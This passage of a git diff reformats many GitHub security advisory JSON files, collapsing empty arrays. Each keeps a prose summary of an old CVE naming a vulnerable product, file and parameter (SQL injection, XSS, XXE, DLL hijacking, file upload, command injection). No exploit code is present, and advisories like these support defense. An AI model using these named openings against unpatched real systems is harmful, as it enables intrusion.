"affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-p8q6-xjj7-f78c/GHSA-p8q6-xjj7-f78c.json b/advisories/unreviewed/2022/05/GHSA-p8q6-xjj7-f78c/GHSA-p8q6-xjj7-f78c.json index 3289555e69b..40bc07777a5 100644 --- a/advisories/unreviewed/2022/05/GHSA-p8q6-xjj7-f78c/GHSA-p8q6-xjj7-f78c.json +++ b/advisories/unreviewed/2022/05/GHSA-p8q6-xjj7-f78c/GHSA-p8q6-xjj7-f78c.json @@ -7,12 +7,8 @@ "CVE-2012-2727" ], "details": "Open redirect vulnerability in the Janrain Capture module 6.x-1.0 and 7.x-1.0 for Drupal, when synchronizing user data, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the destination parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p99j-3cmf-8pxc/GHSA-p99j-3cmf-8pxc.json b/advisories/unreviewed/2022/05/GHSA-p99j-3cmf-8pxc/GHSA-p99j-3cmf-8pxc.json index b9a44999f8f..a25e23ee7a8 100644 --- a/advisories/unreviewed/2022/05/GHSA-p99j-3cmf-8pxc/GHSA-p99j-3cmf-8pxc.json +++ b/advisories/unreviewed/2022/05/GHSA-p99j-3cmf-8pxc/GHSA-p99j-3cmf-8pxc.json @@ -7,12 +7,8 @@ "CVE-2012-3841" ], "details": "Untrusted search path vulnerability in KMPlayer 3.2.0.19 allows local users to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse ehtrace.dll that is located in the current working directory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pc72-m8vf-j48v/GHSA-pc72-m8vf-j48v.json b/advisories/unreviewed/2022/05/GHSA-pc72-m8vf-j48v/GHSA-pc72-m8vf-j48v.json index 4a02a68b8bd..44ffd83b255 100644 --- a/advisories/unreviewed/2022/05/GHSA-pc72-m8vf-j48v/GHSA-pc72-m8vf-j48v.json +++ b/advisories/unreviewed/2022/05/GHSA-pc72-m8vf-j48v/GHSA-pc72-m8vf-j48v.json @@ -7,12 +7,8 @@ "CVE-2012-2252" ], "details": "Incomplete blacklist vulnerability in rssh before 2.3.4, when the rsync protocol is enabled, allows local users to bypass intended restricted shell access via the --rsh command line option.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pfqw-9w76-j32f/GHSA-pfqw-9w76-j32f.json b/advisories/unreviewed/2022/05/GHSA-pfqw-9w76-j32f/GHSA-pfqw-9w76-j32f.json index d86074515de..3a76b61f3f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-pfqw-9w76-j32f/GHSA-pfqw-9w76-j32f.json +++ b/advisories/unreviewed/2022/05/GHSA-pfqw-9w76-j32f/GHSA-pfqw-9w76-j32f.json @@ -7,12 +7,8 @@ "CVE-2012-2997" ], "details": "XML External Entity (XXE) vulnerability in sam/admin/vpe2/public/php/server.php in F5 BIG-IP 10.0.0 through 10.2.4 and 11.0.0 through 11.2.1 allows remote authenticated users to read arbitrary files via a crafted XML file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pfrg-42vh-vgr3/GHSA-pfrg-42vh-vgr3.json b/advisories/unreviewed/2022/05/GHSA-pfrg-42vh-vgr3/GHSA-pfrg-42vh-vgr3.json index 9c9754adeed..4abca1bce28 100644 --- a/advisories/unreviewed/2022/05/GHSA-pfrg-42vh-vgr3/GHSA-pfrg-42vh-vgr3.json +++ b/advisories/unreviewed/2022/05/GHSA-pfrg-42vh-vgr3/GHSA-pfrg-42vh-vgr3.json @@ -7,12 +7,8 @@ "CVE-2012-3845" ], "details": "Buffer overflow in LAN Messenger 1.2.28 and earlier allows remote attackers to cause a denial of service (crash) via a long string in an initiation request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pg2p-q27f-4f79/GHSA-pg2p-q27f-4f79.json b/advisories/unreviewed/2022/05/GHSA-pg2p-q27f-4f79/GHSA-pg2p-q27f-4f79.json index 3ce0f3f644a..5665ba21b1a 100644 --- a/advisories/unreviewed/2022/05/GHSA-pg2p-q27f-4f79/GHSA-pg2p-q27f-4f79.json +++ b/advisories/unreviewed/2022/05/GHSA-pg2p-q27f-4f79/GHSA-pg2p-q27f-4f79.json @@ -7,12 +7,8 @@ "CVE-2012-3366" ], "details": "The Trigger plugin in bcfg2 1.2.x before 1.2.3 allows remote attackers with root access to the client to execute arbitrary commands via shell metacharacters in the UUID field to the server process (bcfg2-server).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pjv6-3frr-mr92/GHSA-pjv6-3frr-mr92.json b/advisories/unreviewed/2022/05/GHSA-pjv6-3frr-mr92/GHSA-pjv6-3frr-mr92.json index 738ae6eea30..9fff38cec11 100644 --- a/advisories/unreviewed/2022/05/GHSA-pjv6-3frr-mr92/GHSA-pjv6-3frr-mr92.json +++ b/advisories/unreviewed/2022/05/GHSA-pjv6-3frr-mr92/GHSA-pjv6-3frr-mr92.json @@ -7,12 +7,8 @@ "CVE-2012-3509" ], "details": "Multiple integer overflows in the (1) _objalloc_alloc function in objalloc.c and (2) objalloc_alloc macro in include/objalloc.h in GNU libiberty, as used by binutils 2.22, allow remote attackers to cause a denial of service (crash) via vectors related to the \"addition of CHUNK_HEADER_SIZE to the length,\" which triggers a heap-based buffer overflow.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pmg7-f4vq-gj32/GHSA-pmg7-f4vq-gj32.json b/advisories/unreviewed/2022/05/GHSA-pmg7-f4vq-gj32/GHSA-pmg7-f4vq-gj32.json index 3a2a0029382..c72d8ac1aab 100644 --- a/advisories/unreviewed/2022/05/GHSA-pmg7-f4vq-gj32/GHSA-pmg7-f4vq-gj32.json +++ b/advisories/unreviewed/2022/05/GHSA-pmg7-f4vq-gj32/GHSA-pmg7-f4vq-gj32.json @@ -7,12 +7,8 @@ "CVE-2012-3269" ], "details": "Unspecified vulnerability in HP Performance Insight 5.31, 5.40, and 5.41, when Sybase is used, allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors, a different vulnerability than CVE-2012-3270.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pmqr-xx66-vp2q/GHSA-pmqr-xx66-vp2q.json b/advisories/unreviewed/2022/05/GHSA-pmqr-xx66-vp2q/GHSA-pmqr-xx66-vp2q.json index 62ed5fa16ce..a86add97c96 100644 --- a/advisories/unreviewed/2022/05/GHSA-pmqr-xx66-vp2q/GHSA-pmqr-xx66-vp2q.json +++ b/advisories/unreviewed/2022/05/GHSA-pmqr-xx66-vp2q/GHSA-pmqr-xx66-vp2q.json @@ -7,12 +7,8 @@ "CVE-2012-3565" ], "details": "Opera before 12.00 Beta allows remote attackers to cause a denial of service (application crash) via crafted characters in domain names, as demonstrated by \"IDNA2008 tests.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pp8p-f52f-v8mp/GHSA-pp8p-f52f-v8mp.json b/advisories/unreviewed/2022/05/GHSA-pp8p-f52f-v8mp/GHSA-pp8p-f52f-v8mp.json index 70d78f62bd4..36892b4c51a 100644 --- a/advisories/unreviewed/2022/05/GHSA-pp8p-f52f-v8mp/GHSA-pp8p-f52f-v8mp.json +++ b/advisories/unreviewed/2022/05/GHSA-pp8p-f52f-v8mp/GHSA-pp8p-f52f-v8mp.json @@ -7,12 +7,8 @@ "CVE-2011-5213" ], "details": "Multiple SQL injection vulnerabilities in BrowserCRM 5.100.01 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) login[username] parameter to index.php, (2) parent_id parameter to modules/Documents/version_list.php, or (3) contact_id parameter to modules/Documents/index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-prrj-cqjg-p2c5/GHSA-prrj-cqjg-p2c5.json b/advisories/unreviewed/2022/05/GHSA-prrj-cqjg-p2c5/GHSA-prrj-cqjg-p2c5.json index 4a4a8080d51..977f4fe5dd7 100644 --- a/advisories/unreviewed/2022/05/GHSA-prrj-cqjg-p2c5/GHSA-prrj-cqjg-p2c5.json +++ b/advisories/unreviewed/2022/05/GHSA-prrj-cqjg-p2c5/GHSA-prrj-cqjg-p2c5.json @@ -7,12 +7,8 @@ "CVE-2012-1417" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Local Phone book and Blacklist form in Yealink VOIP Phones allow remote authenticated users to inject arbitrary web script or HTML via the user field to cgi-bin/ConfigManApp.com.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pv56-xrhc-m887/GHSA-pv56-xrhc-m887.json b/advisories/unreviewed/2022/05/GHSA-pv56-xrhc-m887/GHSA-pv56-xrhc-m887.json index a35941c09b1..8fd8b01070a 100644 --- a/advisories/unreviewed/2022/05/GHSA-pv56-xrhc-m887/GHSA-pv56-xrhc-m887.json +++ b/advisories/unreviewed/2022/05/GHSA-pv56-xrhc-m887/GHSA-pv56-xrhc-m887.json @@ -7,12 +7,8 @@ "CVE-2012-2170" ], "details": "The Application Snoop Servlet in IBM WebSphere Application Server 7.0 before 7.0.0.23 does not properly restrict access, which allows remote attackers to obtain sensitive client and request information via a direct request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pvg9-r5h9-jw55/GHSA-pvg9-r5h9-jw55.json b/advisories/unreviewed/2022/05/GHSA-pvg9-r5h9-jw55/GHSA-pvg9-r5h9-jw55.json index 636db8fdf81..358f7e53660 100644 --- a/advisories/unreviewed/2022/05/GHSA-pvg9-r5h9-jw55/GHSA-pvg9-r5h9-jw55.json +++ b/advisories/unreviewed/2022/05/GHSA-pvg9-r5h9-jw55/GHSA-pvg9-r5h9-jw55.json @@ -7,12 +7,8 @@ "CVE-2012-3125" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows remote attackers to affect availability, related to TCP/IP.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pw8x-27cp-qr6j/GHSA-pw8x-27cp-qr6j.json b/advisories/unreviewed/2022/05/GHSA-pw8x-27cp-qr6j/GHSA-pw8x-27cp-qr6j.json index 646eaa51c3b..490f5bc9e9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-pw8x-27cp-qr6j/GHSA-pw8x-27cp-qr6j.json +++ b/advisories/unreviewed/2022/05/GHSA-pw8x-27cp-qr6j/GHSA-pw8x-27cp-qr6j.json @@ -7,12 +7,8 @@ "CVE-2011-5234" ], "details": "SQL injection vulnerability in user.php in Social Network Community 2 allows remote attackers to execute arbitrary SQL commands via the userId parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pwf5-wh33-96q9/GHSA-pwf5-wh33-96q9.json b/advisories/unreviewed/2022/05/GHSA-pwf5-wh33-96q9/GHSA-pwf5-wh33-96q9.json index 5bbaef98472..d636acbcd9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-pwf5-wh33-96q9/GHSA-pwf5-wh33-96q9.json +++ b/advisories/unreviewed/2022/05/GHSA-pwf5-wh33-96q9/GHSA-pwf5-wh33-96q9.json @@ -7,12 +7,8 @@ "CVE-2012-3729" ], "details": "The Berkeley Packet Filter (BPF) interpreter implementation in the kernel in Apple iOS before 6 accesses uninitialized memory locations, which allows local users to obtain sensitive information about the layout of kernel memory via a crafted program that uses a BPF interface.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pwhv-hpq9-gfpf/GHSA-pwhv-hpq9-gfpf.json b/advisories/unreviewed/2022/05/GHSA-pwhv-hpq9-gfpf/GHSA-pwhv-hpq9-gfpf.json index a9abe7100e0..b48778f3938 100644 --- a/advisories/unreviewed/2022/05/GHSA-pwhv-hpq9-gfpf/GHSA-pwhv-hpq9-gfpf.json +++ b/advisories/unreviewed/2022/05/GHSA-pwhv-hpq9-gfpf/GHSA-pwhv-hpq9-gfpf.json @@ -7,12 +7,8 @@ "CVE-2012-1728" ], "details": "Unspecified vulnerability in the Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Portal Framework.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pxw2-xfhf-fj8w/GHSA-pxw2-xfhf-fj8w.json b/advisories/unreviewed/2022/05/GHSA-pxw2-xfhf-fj8w/GHSA-pxw2-xfhf-fj8w.json index befe3d59161..63f7a194dbb 100644 --- a/advisories/unreviewed/2022/05/GHSA-pxw2-xfhf-fj8w/GHSA-pxw2-xfhf-fj8w.json +++ b/advisories/unreviewed/2022/05/GHSA-pxw2-xfhf-fj8w/GHSA-pxw2-xfhf-fj8w.json @@ -7,12 +7,8 @@ "CVE-2012-1195" ], "details": "Unrestricted file upload vulnerability in andesk/managementsuite/core/core.anonymous/ServerSetup.asmx in the ServerSetup web service in Lenovo ThinkManagement Console 9.0.3 allows remote attackers to execute arbitrary code by uploading a file with an executable extension via a PutUpdateFileCore command in a RunAMTCommand SOAP request, then accessing the file via a direct request to the file in the web root.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pxw8-cr7g-xv95/GHSA-pxw8-cr7g-xv95.json b/advisories/unreviewed/2022/05/GHSA-pxw8-cr7g-xv95/GHSA-pxw8-cr7g-xv95.json index cd3fde517f4..69460512e8f 100644 --- a/advisories/unreviewed/2022/05/GHSA-pxw8-cr7g-xv95/GHSA-pxw8-cr7g-xv95.json +++ b/advisories/unreviewed/2022/05/GHSA-pxw8-cr7g-xv95/GHSA-pxw8-cr7g-xv95.json @@ -7,12 +7,8 @@ "CVE-2012-1744" ], "details": "Unspecified vulnerability in the Oracle Outside In Technology component in Oracle Fusion Middleware 8.3.5 and 8.3.7 allows context-dependent users to affect availability via unknown vectors related to Outside In Filters.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q22f-p36h-w3hq/GHSA-q22f-p36h-w3hq.json b/advisories/unreviewed/2022/05/GHSA-q22f-p36h-w3hq/GHSA-q22f-p36h-w3hq.json index 92c9ff00404..b1066e6ebb5 100644 --- a/advisories/unreviewed/2022/05/GHSA-q22f-p36h-w3hq/GHSA-q22f-p36h-w3hq.json +++ b/advisories/unreviewed/2022/05/GHSA-q22f-p36h-w3hq/GHSA-q22f-p36h-w3hq.json @@ -7,12 +7,8 @@ "CVE-2012-1982" ], "details": "Cross-site scripting (XSS) vulnerability in my_admin/admin1_list_pages.php in SocialCMS 1.0.2 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the TR_title parameter in an edit action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q297-9mxq-hhg9/GHSA-q297-9mxq-hhg9.json b/advisories/unreviewed/2022/05/GHSA-q297-9mxq-hhg9/GHSA-q297-9mxq-hhg9.json index d2842ddbf34..bb20656c6f9 100644 --- a/advisories/unreviewed/2022/05/GHSA-q297-9mxq-hhg9/GHSA-q297-9mxq-hhg9.json +++ b/advisories/unreviewed/2022/05/GHSA-q297-9mxq-hhg9/GHSA-q297-9mxq-hhg9.json @@ -7,12 +7,8 @@ "CVE-2012-0903" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Zimbra Desktop 7.1.2 b10978 allow remote attackers to inject arbitrary web script or HTML via the (1) Username or (2) MailBox Name.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q2cg-h2mc-rvj3/GHSA-q2cg-h2mc-rvj3.json b/advisories/unreviewed/2022/05/GHSA-q2cg-h2mc-rvj3/GHSA-q2cg-h2mc-rvj3.json index a9558997f60..692288cb0f1 100644 --- a/advisories/unreviewed/2022/05/GHSA-q2cg-h2mc-rvj3/GHSA-q2cg-h2mc-rvj3.json +++ b/advisories/unreviewed/2022/05/GHSA-q2cg-h2mc-rvj3/GHSA-q2cg-h2mc-rvj3.json @@ -7,12 +7,8 @@ "CVE-2012-0917" ], "details": "Cross-site scripting (XSS) vulnerability in Hitachi IT Operations Analyzer 02-01, 02-51 through 02-51-01, and 02-53 through 02-53-02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q2w7-cc4g-wqf2/GHSA-q2w7-cc4g-wqf2.json b/advisories/unreviewed/2022/05/GHSA-q2w7-cc4g-wqf2/GHSA-q2w7-cc4g-wqf2.json index 856df4d9e9b..81bf2c0d055 100644 --- a/advisories/unreviewed/2022/05/GHSA-q2w7-cc4g-wqf2/GHSA-q2w7-cc4g-wqf2.json +++ b/advisories/unreviewed/2022/05/GHSA-q2w7-cc4g-wqf2/GHSA-q2w7-cc4g-wqf2.json @@ -7,12 +7,8 @@ "CVE-2012-2188" ], "details": "IBM Power Hardware Management Console (HMC) 7R3.5.0 before SP4, 7R7.1.0 and 7R7.2.0 before 7R7.2.0 SP3, and 7R7.3.0 before SP2, and Systems Director Management Console (SDMC) 6R7.3.0 before SP2, does not properly restrict the VIOS viosrvcmd command, which allows local users to gain privileges via vectors involving a (1) $ (dollar sign) or (2) & (ampersand) character.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-q2xm-ggmm-7g9x/GHSA-q2xm-ggmm-7g9x.json b/advisories/unreviewed/2022/05/GHSA-q2xm-ggmm-7g9x/GHSA-q2xm-ggmm-7g9x.json index 8a22105e288..5d41d99037f 100644 --- a/advisories/unreviewed/2022/05/GHSA-q2xm-ggmm-7g9x/GHSA-q2xm-ggmm-7g9x.json +++ b/advisories/unreviewed/2022/05/GHSA-q2xm-ggmm-7g9x/GHSA-q2xm-ggmm-7g9x.json @@ -7,12 +7,8 @@ "CVE-2012-2209" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in admin.php in Piwigo before 2.3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) section parameter in the configuration module, (2) installstatus parameter in the languages_new module, or (3) theme parameter in the theme module.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q33c-gmxm-rrhg/GHSA-q33c-gmxm-rrhg.json b/advisories/unreviewed/2022/05/GHSA-q33c-gmxm-rrhg/GHSA-q33c-gmxm-rrhg.json index 6d387130f82..7ad465c11ad 100644 --- a/advisories/unreviewed/2022/05/GHSA-q33c-gmxm-rrhg/GHSA-q33c-gmxm-rrhg.json +++ b/advisories/unreviewed/2022/05/GHSA-q33c-gmxm-rrhg/GHSA-q33c-gmxm-rrhg.json @@ -7,12 +7,8 @@ "CVE-2012-2172" ], "details": "Cross-site scripting (XSS) vulnerability in SoftwareRegistration.do in the Storage Manager Profiler in IBM System Storage DS Storage Manager before 10.83.xx.18 on DS Series devices allows remote attackers to inject arbitrary web script or HTML via the updateRegn parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q4fm-qwm6-q8fx/GHSA-q4fm-qwm6-q8fx.json b/advisories/unreviewed/2022/05/GHSA-q4fm-qwm6-q8fx/GHSA-q4fm-qwm6-q8fx.json index 7b3752a166a..5d78e4462ac 100644 --- a/advisories/unreviewed/2022/05/GHSA-q4fm-qwm6-q8fx/GHSA-q4fm-qwm6-q8fx.json +++ b/advisories/unreviewed/2022/05/GHSA-q4fm-qwm6-q8fx/GHSA-q4fm-qwm6-q8fx.json @@ -7,12 +7,8 @@ "CVE-2012-1647" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the \"stand alone PHP application for the OSM Player,\" as used in the MediaFront module 6.x-1.x before 6.x-1.5 and 7.x-1.x before 7.x-1.5 for Drupal, allow remote attackers to inject arbitrary web script or HTML via (1) $_SERVER['HTTP_HOST'] or (2) $_SERVER['SCRIPT_NAME'] to players/osmplayer/player/OSMPlayer.php, (3) playlist parameter to players/osmplayer/player/getplaylist.php, and possibly other vectors related to $_SESSION.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q4vq-55mw-v867/GHSA-q4vq-55mw-v867.json b/advisories/unreviewed/2022/05/GHSA-q4vq-55mw-v867/GHSA-q4vq-55mw-v867.json index 054f1679716..600703078f6 100644 --- a/advisories/unreviewed/2022/05/GHSA-q4vq-55mw-v867/GHSA-q4vq-55mw-v867.json +++ b/advisories/unreviewed/2022/05/GHSA-q4vq-55mw-v867/GHSA-q4vq-55mw-v867.json @@ -7,12 +7,8 @@ "CVE-2011-5261" ], "details": "Cross-site scripting (XSS) vulnerability in serverreport.cgi in Axis M10 Series Network Cameras M1054 firmware 5.21 and earlier allows remote attackers to inject arbitrary web script or HTML via the pageTitle parameter to admin/showReport.shtml.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q53h-2rr5-4cff/GHSA-q53h-2rr5-4cff.json b/advisories/unreviewed/2022/05/GHSA-q53h-2rr5-4cff/GHSA-q53h-2rr5-4cff.json index 09a1e67761b..dd15b049012 100644 --- a/advisories/unreviewed/2022/05/GHSA-q53h-2rr5-4cff/GHSA-q53h-2rr5-4cff.json +++ b/advisories/unreviewed/2022/05/GHSA-q53h-2rr5-4cff/GHSA-q53h-2rr5-4cff.json @@ -7,12 +7,8 @@ "CVE-2012-4055" ], "details": "SQL injection vulnerability in index2.php in Uiga Fan Club allows remote attackers to execute arbitrary SQL commands via the p parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q59q-qw62-x3cx/GHSA-q59q-qw62-x3cx.json b/advisories/unreviewed/2022/05/GHSA-q59q-qw62-x3cx/GHSA-q59q-qw62-x3cx.json index 76de14eb36f..edf07b1d5ce 100644 --- a/advisories/unreviewed/2022/05/GHSA-q59q-qw62-x3cx/GHSA-q59q-qw62-x3cx.json +++ b/advisories/unreviewed/2022/05/GHSA-q59q-qw62-x3cx/GHSA-q59q-qw62-x3cx.json @@ -7,12 +7,8 @@ "CVE-2012-3334" ], "details": "Stack-based buffer overflow in IBM Informix Dynamic Server (IDS) 11.50 before 11.50.xC9W2 and 11.70 before 11.70.xC5 allows remote authenticated users to execute arbitrary code via crafted arguments in a SET COLLATION statement.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q8pp-g2w7-5hpc/GHSA-q8pp-g2w7-5hpc.json b/advisories/unreviewed/2022/05/GHSA-q8pp-g2w7-5hpc/GHSA-q8pp-g2w7-5hpc.json index 8512257c580..c4fb831ea1c 100644 --- a/advisories/unreviewed/2022/05/GHSA-q8pp-g2w7-5hpc/GHSA-q8pp-g2w7-5hpc.json +++ b/advisories/unreviewed/2022/05/GHSA-q8pp-g2w7-5hpc/GHSA-q8pp-g2w7-5hpc.json @@ -7,12 +7,8 @@ "CVE-2012-2717" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Mobile Tools module 6.x-2.x before 6.x-2.3 for Drupal allow remote attackers to inject arbitrary web script or HTML via the (1) Mobile URL field or (2) Desktop URL field to the General configuration page, or the (3) message to the Mobile Tools block message options.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q8rh-w3fr-95f7/GHSA-q8rh-w3fr-95f7.json b/advisories/unreviewed/2022/05/GHSA-q8rh-w3fr-95f7/GHSA-q8rh-w3fr-95f7.json index 9efbf9d1df1..c165a540811 100644 --- a/advisories/unreviewed/2022/05/GHSA-q8rh-w3fr-95f7/GHSA-q8rh-w3fr-95f7.json +++ b/advisories/unreviewed/2022/05/GHSA-q8rh-w3fr-95f7/GHSA-q8rh-w3fr-95f7.json @@ -7,12 +7,8 @@ "CVE-2012-0848" ], "details": "Heap-based buffer overflow in the ws_snd_decode_frame function in libavcodec/ws-snd1.c in FFmpeg 0.9.1 allows remote attackers to cause a denial of service (application crash) via a crafted media file, related to an incorrect calculation, aka \"wrong samples count.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-q99p-55v3-v8hw/GHSA-q99p-55v3-v8hw.json b/advisories/unreviewed/2022/05/GHSA-q99p-55v3-v8hw/GHSA-q99p-55v3-v8hw.json index 59c9d36c950..5cb13977dd2 100644 --- a/advisories/unreviewed/2022/05/GHSA-q99p-55v3-v8hw/GHSA-q99p-55v3-v8hw.json +++ b/advisories/unreviewed/2022/05/GHSA-q99p-55v3-v8hw/GHSA-q99p-55v3-v8hw.json @@ -7,12 +7,8 @@ "CVE-2012-1754" ], "details": "Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to UI Framework, a different vulnerability than CVE-2012-1732.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qc72-grw6-qfmg/GHSA-qc72-grw6-qfmg.json b/advisories/unreviewed/2022/05/GHSA-qc72-grw6-qfmg/GHSA-qc72-grw6-qfmg.json index 5903e6b7f11..62496f41020 100644 --- a/advisories/unreviewed/2022/05/GHSA-qc72-grw6-qfmg/GHSA-qc72-grw6-qfmg.json +++ 